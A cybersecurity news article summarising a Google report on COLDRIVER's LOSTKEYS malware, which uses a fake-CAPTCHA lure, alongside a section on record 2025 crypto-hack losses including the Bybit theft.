The landscape of cyber threats is continuously evolving, with new players emerging and advanced tactics being employed. A recent report from Google Threat Intelligence has shed light on the activities of a Russian-backed threat group known as COLDRIVER, which is reportedly using a new form of malware named LOSTKEYS to target Western entities.
According to the findings, the COLDRIVER group has pivoted from traditional credential phishing to more sophisticated methods, effectively escalating their cyberattack strategy. The LOSTKEYS malware operates through a multi-step installation process that begins with a lure website, featuring a fake CAPTCHA, which tricks users into initiating the attack.
The malware utilizes a PowerShell script that is secretly downloaded to the user’s clipboard. This clandestine approach involves evading device detection mechanisms and ultimately retrieving the final payload. The entire operation culminates in the installation of the malware, effectively compromising the target’s systems.
Once deployed, LOSTKEYS exhibits an alarming capability to siphon off files from various extensions and directories while simultaneously sending critical system information and active processes back to COLDRIVER. The report indicates that the attack is traced back to the IP address “165.227.148[.]68,” underscoring the need for heightened vigilance.
In response to this emerging threat, Google has proactively taken steps to curtail potential damage from LOSTKEYS by incorporating the malicious sites associated with it into their “Safe Browsing” feature, thereby providing an additional layer of security for users.
COLDRIVER’s activities primarily focus on high-profile Western targets, including former diplomats and journalists, making it imperative for organizations to remain aware of the evolving tactics employed by such groups. In January 2024, COLDRIVER’s attack vector included another malware named Spica, designed for executing arbitrary shell commands and uploading or downloading software.
The Bigger Picture: Crypto Hacks Reach Unprecedented Levels
This concerning trend in cyber threats parallels another alarming development: the significant surge in cryptocurrency hacks. As reported, losses attributed to crypto hacks have skyrocketed in 2025, totaling $2 billion in just the first quarter, surpassing all losses recorded in 2024.
The cybersecurity firm Hacken highlights that operational vulnerabilities and insufficient access controls remain persistent challenges, affecting both centralized and decentralized players in the crypto space. Attackers are increasingly employing social engineering tactics to exploit users’ trust, which has contributed to the staggering financial losses this year.
A notable incident exacerbating these losses was the $1.5 billion hack of the cryptocurrency exchange Bybit in February, which was reportedly orchestrated by the notorious Lazarus Group.
In conclusion, organizations, especially those involved in sensitive sectors, must remain vigilant and proactive in their cybersecurity strategies. The threat landscape is dynamic, requiring continuous adaptation and awareness as malicious actors like COLDRIVER and the rising frequency of crypto hacks evolve.
